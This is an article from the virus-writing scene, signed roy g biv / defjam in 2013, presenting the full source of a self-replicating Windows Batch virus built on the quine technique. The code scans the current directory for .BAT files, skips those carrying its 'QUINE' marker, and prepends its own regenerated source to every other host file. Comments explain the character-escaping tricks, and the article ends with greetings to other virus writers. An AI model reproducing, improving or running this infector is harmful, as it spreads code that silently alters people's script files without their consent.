﻿                            Quine Viruses in Batch
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

@REM QUINE - ROY G BIV 19/09/13
@ECHO OFF
SETLOCAL ENABLEDELAYEDEXPANSION
REM place atoi(code,16) after "SET A="
SET A=
REM xlat table - Batch has no concept of itoa()
REM certain characters cannot be placed in the SET because they must be escaped
REM and that affects the index of the following characters
REM so they are handled in code instead
SET B= R"#$RR'()*+,-./0123456789:;R=R?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]R_`abcdefghijklmnopqrstuvwxyz{R}~
REM for each encoded character
FOR /L %%A IN (0,2,xxxx)DO CALL:E %%A
REM find all .BAT files
FOR %%A IN (*.BAT)DO IF %%~ZA LSS 60000 CALL:I %%A
ENDLOCAL
@ECHO ON
@GOTO:K
:E
REM place atoi() code
IF %1==160 SET F=!F!%A%
SET /A G=0x!A:~%1,2!
SET /A H=G-32
REM ignore CR if present (I don't include them so I don't need this check)
REM IF %G%==13 (
REM )ELSE
IF %G%==10 (
    REM the blank line is required in order to emit individual lines!
    SET F=!F!^

)ELSE IF %H%==1 (SET F=!F!^^!
)ELSE IF %H%==5 (SET F=!F!%%
)ELSE IF %H%==6 (SET F=!F!^&
)ELSE IF %H%==28 (SET F=!F!^<
)ELSE IF %H%==30 (SET F=!F!^>
)ELSE IF %H%==62 (SET F=!F!^^^^
)ELSE IF %H%==92 (SET F=!F!^|
REM itoa()
)ELSE SET F=!F!!B:~%H%,1!
GOTO:EOF
:I
REM read first line of file
FOR /F "TOKENS=*" %%B IN (%1)DO (
    SET J=%%B
    REM check for infection marker
    IF "!J:~5,5!" NEQ "QUINE" (
        REN %1 R
        REM write virus
        ECHO !F!>%1
        REM write host
        TYPE R>>%1
        DEL R
    )
    GOTO:EOF
)
:K


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam september 2013
iam_rgb@hotmail.com
